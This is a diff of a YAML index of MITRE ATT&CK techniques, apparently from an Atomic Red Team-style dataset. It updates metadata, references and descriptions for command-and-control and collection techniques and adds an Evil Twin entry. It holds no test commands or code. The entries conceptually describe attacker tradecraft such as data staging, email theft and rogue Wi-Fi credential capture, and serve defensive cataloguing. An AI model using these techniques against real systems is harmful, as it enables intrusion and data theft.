       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -39877,7 +40362,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -39900,8 +40385,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -39926,7 +40409,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -39946,8 +40429,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -40001,7 +40482,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -40026,7 +40506,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:12:30.499Z'
       name: Dead Drop Resolver
       description: |-
         Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
@@ -40052,8 +40532,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1001.001:
     technique:
@@ -40107,7 +40585,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
 collection:
   T1560.001:
@@ -40183,7 +40660,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1560.001
     atomic_tests: []
   T1113:
@@ -40240,7 +40716,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
       identifier: T1113
     atomic_tests: []
   T1557:
@@ -40334,7 +40809,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1056.001:
     technique:
@@ -40413,7 +40887,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1056.001
     atomic_tests: []
   T1602:
@@ -40452,7 +40925,7 @@ collection:
         Adversaries may collect data related to managed devices from configuration repositories. Configuration repositories are used by management systems in order to configure, manage, and control data on remote systems. Configuration repositories may also facilitate remote access and administration of devices.
 
         Adversaries may target these repositories in order to collect large quantities of sensitive system administration data. Data from configuration repositories may be exposed by various protocols and software and can store a wide variety of data, much of which may align with adversary Discovery objectives.(Citation: US-CERT-TA18-106A)(Citation: US-CERT TA17-156A SNMP Abuse 2017)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T21:32:58.274Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Data from Configuration Repository
       x_mitre_detection: 'Identify network traffic sent or received by untrusted hosts
@@ -40467,30 +40940,10 @@ collection:
       - 'Network Traffic: Network Connection Creation'
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1213.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - Office 365
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
-      type: attack-pattern
-      created: '2020-02-14T13:35:32.938Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1213.002
-        url: https://attack.mitre.org/techniques/T1213/002
-      - url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
-        description: Microsoft. (2017, July 19). Configure audit settings for a site
-          collection. Retrieved April 4, 2018.
-        source_name: Microsoft SharePoint Logging
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Sharepoint
       description: |
         Adversaries may leverage the SharePoint repository as a source to mine valuable information. SharePoint will often contain useful information for an adversary to learn about the structure and functionality of the internal network and systems. For example, the following is a list of example information that may hold potential value to an adversary and may also be found on SharePoint:
@@ -40499,13 +40952,17 @@ collection:
         * Physical / logical network diagrams
         * System architecture diagrams
         * Technical system documentation
-        * Testing / development credentials
+        * Testing / development credentials (i.e., [Unsecured Credentials](https://attack.mitre.org/techniques/T1552))
         * Work / project schedules
         * Source code snippets
         * Links to network shares and other internal resources
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Arun Seelagan, CISA
+      x_mitre_deprecated: false
       x_mitre_detection: "The user access logging within Microsoft's SharePoint can
         be configured to report access to certain pages and documents. (Citation:
         Microsoft SharePoint Logging). As information repositories generally have
@@ -40519,20 +40976,37 @@ collection:
         of programmatic means being used to retrieve all data within the repository.
         In environments with high-maturity, it may be possible to leverage User-Behavioral
         Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - Office Suite
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      - 'Cloud Service: Cloud Service Metadata'
+      type: attack-pattern
+      id: attack-pattern--0c4b4fda-9062-47da-98b9-ceae2dcf052a
+      created: '2020-02-14T13:35:32.938Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1213/002
+        external_id: T1213.002
+      - source_name: Microsoft SharePoint Logging
+        description: Microsoft. (2017, July 19). Configure audit settings for a site
+          collection. Retrieved April 4, 2018.
+        url: https://support.office.com/en-us/article/configure-audit-settings-for-a-site-collection-a9920c97-38c0-44f2-8bcb-4cf1e2ae22d2
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
     atomic_tests: []
   T1123:
     technique:
-      modified: '2024-01-23T22:53:18.389Z'
+      modified: '2024-10-15T13:39:22.774Z'
       name: Audio Capture
       description: |-
         An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into sensitive conversations to gather information.(Citation: ESET Attor Oct 2019)
@@ -40575,7 +41049,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1123
     atomic_tests: []
   T1560.003:
@@ -40600,7 +41073,7 @@ collection:
         description: 'ESET. (2016, October). En Route with Sednit - Part 2: Observing
           the Comings and Goings. Retrieved November 21, 2016.'
         source_name: ESET Sednit Part 2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-25T22:48:14.605Z'
       name: Archive via Custom Method
       description: 'An adversary may compress or encrypt data that is collected prior
         to exfiltration using a custom method. Adversaries may choose to use custom
@@ -40620,22 +41093,24 @@ collection:
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Script: Script Execution'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1114:
     technique:
-      modified: '2023-09-29T21:06:03.098Z'
+      modified: '2024-10-15T12:24:27.627Z'
       name: Email Collection
       description: 'Adversaries may target user email to collect sensitive information.
         Emails may contain sensitive data, including trade secrets or personal information,
-        that can prove valuable to adversaries. Adversaries can collect or forward
-        email from mail servers or clients. '
+        that can prove valuable to adversaries. Emails may also contain details of
+        ongoing incident response operations, which may allow adversaries to adjust
+        their techniques in order to maintain persistence or evade defenses.(Citation:
+        TrustedSec OOB Communications)(Citation: CISA AA20-352A 2021) Adversaries
+        can collect or forward email from mail servers or clients. '
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
       x_mitre_contributors:
       - Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
@@ -40652,11 +41127,10 @@ collection:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
       - macOS
       - Linux
-      x_mitre_version: '2.5'
+      - Office Suite
+      x_mitre_version: '2.6'
       x_mitre_data_sources:
       - 'Logon Session: Logon Session Creation'
       - 'Application Log: Application Log Content'
@@ -40672,37 +41146,28 @@ collection:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1114
         external_id: T1114
+      - source_name: CISA AA20-352A 2021
+        description: CISA. (2021, April 15). Advanced Persistent Threat Compromise
+          of Government Agencies, Critical Infrastructure, and Private Sector Organizations.
+          Retrieved August 30, 2024.
+        url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-352a
       - source_name: Microsoft Tim McMichael Exchange Mail Forwarding 2
         description: McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding.
           Retrieved October 8, 2019.
         url: https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/
+      - source_name: TrustedSec OOB Communications
+        description: 'Tyler Hudak. (2022, December 29). To OOB, or Not to OOB?: Why
+          Out-of-Band Communications are Essential for Incident Response. Retrieved
+          August 30, 2024.'
+        url: https://trustedsec.com/blog/to-oob-or-not-to-oob-why-out-of-band-communications-are-essential-for-incident-response
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1025:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - William Cain
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
-      type: attack-pattern
-      created: '2017-05-31T21:30:31.584Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        url: https://attack.mitre.org/techniques/T1025
-        external_id: T1025
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-10-15T16:30:50.936Z'
       name: Data from Removable Media
       description: "Adversaries may search connected removable media on computers
         they have compromised to find files of interest. Sensitive data can be collected
@@ -40714,75 +41179,93 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - William Cain
+      x_mitre_deprecated: false
       x_mitre_detection: Monitor processes and command-line arguments for actions
         that could be taken to collect files from a system's connected removable media.
         Remote access tools with built-in features may interact directly with the
         Windows API to gather data. Data may also be acquired through Windows system
         management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
         and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
       x_mitre_system_requirements:
       - Privileges to access removable media drive and files
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1b7ba276-eedc-4951-a762-0ceea2c030ec
+      created: '2017-05-31T21:30:31.584Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1025
+        external_id: T1025
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1025
     atomic_tests: []
   T1074.001:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Massimiliano Romano, BT Security
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      type: attack-pattern
-      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
-      created: '2020-03-13T21:13:10.467Z'
-      x_mitre_version: '1.1'
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.001
-        url: https://attack.mitre.org/techniques/T1074/001
-      - source_name: Prevailion DarkWatchman 2021
-        url: https://www.prevailion.com/darkwatchman-new-fileless-techniques/
-        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
-          new evolution in fileless techniques. Retrieved January 10, 2022.'
-      x_mitre_deprecated: false
-      revoked: false
+      modified: '2024-08-26T16:28:39.920Z'
+      name: 'Data Staged: Local Data Staging'
       description: |-
         Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
 
         Adversaries may also stage collected data in various available formats/locations of a system, including local storage databases/repositories or the Windows Registry.(Citation: Prevailion DarkWatchman 2021)
-      modified: '2022-05-11T14:00:00.188Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: 'Data Staged: Local Data Staging'
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Massimiliano Romano, BT Security
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
 
         Consider monitoring accesses and modifications to local storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection.
-      kill_chain_phases:
-      - kill_chain_name: mitre-attack
-        phase_name: collection
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Windows Registry: Windows Registry Key Modification'
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--1c34f7aa-9341-4a48-bfab-af22e51aca6c
+      created: '2020-03-13T21:13:10.467Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/001
+        external_id: T1074.001
+      - source_name: Prevailion DarkWatchman 2021
+        description: 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A
+          new evolution in fileless techniques. Retrieved January 10, 2022.'
+        url: https://web.archive.org/web/20220629230035/https://www.prevailion.com/darkwatchman-new-fileless-techniques/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1074.001
     atomic_tests: []
   T1114.001:
@@ -40809,7 +41292,7 @@ collection:
         url: https://support.office.com/en-us/article/introduction-to-outlook-data-files-pst-and-ost-222eaf92-a995-45d9-bde2-f331f60e2790
         description: Microsoft. (n.d.). Introduction to Outlook Data Files (.pst and
           .ost). Retrieved February 19, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T17:59:20.983Z'
       name: 'Email Collection: Local Email Collection'
       description: |-
         Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.
@@ -40833,13 +41316,11 @@ collection:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1114.001
     atomic_tests: []
   T1119:
     technique:
-      modified: '2024-01-02T13:35:57.680Z'
+      modified: '2024-09-25T20:40:07.791Z'
       name: Automated Collection
       description: "Once established within a system or network, an adversary may
         use automated techniques for collecting internal data. Methods for performing
@@ -40860,6 +41341,7 @@ collection:
         phase_name: collection
       x_mitre_contributors:
       - Praetorian
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Depending on the method used, actions could include common
         file system commands and parameters on the command-line interface within batch
@@ -40883,8 +41365,10 @@ collection:
       - Windows
       - IaaS
       - SaaS
-      x_mitre_version: '1.2'
+      - Office Suite
+      x_mitre_version: '1.3'
       x_mitre_data_sources:
+      - 'User Account: User Account Authentication'
       - 'Command: Command Execution'
       - 'File: File Access'
       - 'Script: Script Execution'
@@ -40909,7 +41393,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1119
     atomic_tests: []
   T1115:
@@ -40976,12 +41459,11 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1115
     atomic_tests: []
   T1530:
     technique:
-      modified: '2023-09-29T16:11:43.530Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Data from Cloud Storage Object
       description: "Adversaries may access data from cloud storage.\n\nMany IaaS providers
         offer solutions for online data object storage such as Amazon S3, Azure Storage,
@@ -41015,10 +41497,12 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Netskope
       - Praetorian
       - AppOmni
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor for unusual queries to the cloud provider's storage
         service. Activity originating from unexpected sources may indicate improper
@@ -41029,13 +41513,14 @@ collection:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - IaaS
       - SaaS
-      - Google Workspace
-      - Office 365
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
+      - 'Cloud Service: Cloud Service Metadata'
       - 'Cloud Storage: Cloud Storage Access'
       type: attack-pattern
       id: attack-pattern--3298ce88-1628-43b1-87d9-0b5336b193d7
@@ -41076,37 +41561,11 @@ collection:
         url: https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1530
     atomic_tests: []
   T1074.002:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - IaaS
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Praetorian
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
-      type: attack-pattern
-      created: '2020-03-13T21:14:58.206Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1074.002
-        url: https://attack.mitre.org/techniques/T1074/002
-      - source_name: Mandiant M-Trends 2020
-        url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
-        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
-          2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-30T13:28:37.414Z'
       name: Remote Data Staging
       description: |-
         Adversaries may stage data collected from multiple systems in a central location or directory on one system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.
@@ -41117,23 +41576,47 @@ collection:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Praetorian
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging.
 
         Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - IaaS
+      - Linux
+      - macOS
       x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'File: File Creation'
       - 'Command: Command Execution'
       - 'File: File Access'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--359b00ad-9425-420b-bba5-6de8d600cbc0
+      created: '2020-03-13T21:14:58.206Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1074/002
+        external_id: T1074.002
+      - source_name: Mandiant M-Trends 2020
+        description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
+          2020.
+        url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1005:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-12T23:54:39.466Z'
       name: Data from Local System
       description: |
         Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
@@ -41203,7 +41686,6 @@ collection:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1005
     atomic_tests: []
   T1560.002:
@@ -41238,7 +41720,7 @@ collection:
         description: Wikipedia. (2016, March 31). List of file signatures. Retrieved
           April 22, 2016.
         source_name: Wikipedia File Header Signatures
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-29T18:27:30.891Z'
       name: 'Archive Collected Data: Archive via Library'
       description: |-
         An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.
@@ -41257,10 +41739,89 @@ collection:
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1560.002
     atomic_tests: []
+  T1557.004:
+    technique:
+      modified: '2024-11-11T18:52:53.686Z'
+      name: Evil Twin
+      description: "Adversaries may host seemingly genuine Wi-Fi access points to
+        deceive users into connecting to malicious networks as a way of supporting
+        follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040),
+        [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002),
+        or [Input Capture](https://attack.mitre.org/techniques/T1056).(Citation: Australia
+        ‘Evil Twin’)\n\nBy using a Service Set Identifier (SSID) of a legitimate Wi-Fi
+        network, fraudulent Wi-Fi access points may trick devices or users into connecting
+        to malicious Wi-Fi networks.(Citation: Kaspersky evil twin)(Citation: medium
+        evil twin)  Adversaries may provide a stronger signal strength or block access
+        to Wi-Fi access points to coerce or entice victim devices into connecting
+        to malicious networks.(Citation: specter ops evil twin)  A Wi-Fi Pineapple
+        – a network security auditing and penetration testing tool – may be deployed
+        in Evil Twin attacks for ease of use and broader range. Custom certificates
+        may be used in an attempt to intercept HTTPS traffic. \n\nSimilarly, adversaries
+        may also listen for client devices sending probe requests for known or previously
+        connected networks (Preferred Network Lists or PNLs). When a malicious access
+        point receives a probe request, adversaries can respond with the same SSID
+        to imitate the trusted, known network.(Citation: specter ops evil twin)  Victim
+        devices are led to believe the responding access point is from their PNL and
+        initiate a connection to the fraudulent network.\n\nUpon logging into the
+        malicious Wi-Fi access point, a user may be directed to a fake login page
+        or captive portal webpage to capture the victim’s credentials. Once a user
+        is logged into the fraudulent Wi-Fi network, the adversary may able to monitor
+        network activity, manipulate data, or steal additional credentials. Locations
+        with high concentrations of public Wi-Fi access, such as airports, coffee
+        shops, or libraries, may be targets for adversaries to set up illegitimate
+        Wi-Fi access points. "
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: credential-access
+      - kill_chain_name: mitre-attack
+        phase_name: collection
+      x_mitre_contributors:
+      - Menachem Goldstein
+      - DeFord L. Smith
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Network
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
